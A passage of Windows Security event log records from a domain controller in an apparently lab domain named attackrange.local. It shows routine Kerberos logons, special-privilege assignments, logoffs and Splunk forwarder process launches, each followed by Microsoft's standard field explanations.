- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264444
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x810683
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:12:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264452
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81138D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:12:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264451
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x81138D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62656
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:12:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264450
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81138D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:13:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264454
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd38
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264453
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a38
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264455
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x3bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264456
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264458
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1518
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264457
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264459
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264462
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x814DE4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:13:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264461
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x814DE4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62670
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:13:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264460
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x814DE4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264473
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81526E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264472
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81535C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264471
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8153A4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264470
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x815437
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62675
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264469
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x815437
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264468
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8153A4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62674
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264467
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8153A4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264466
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x81535C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264465
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81535C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264464
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x81526E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62673
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264463
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81526E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:14:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264475
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
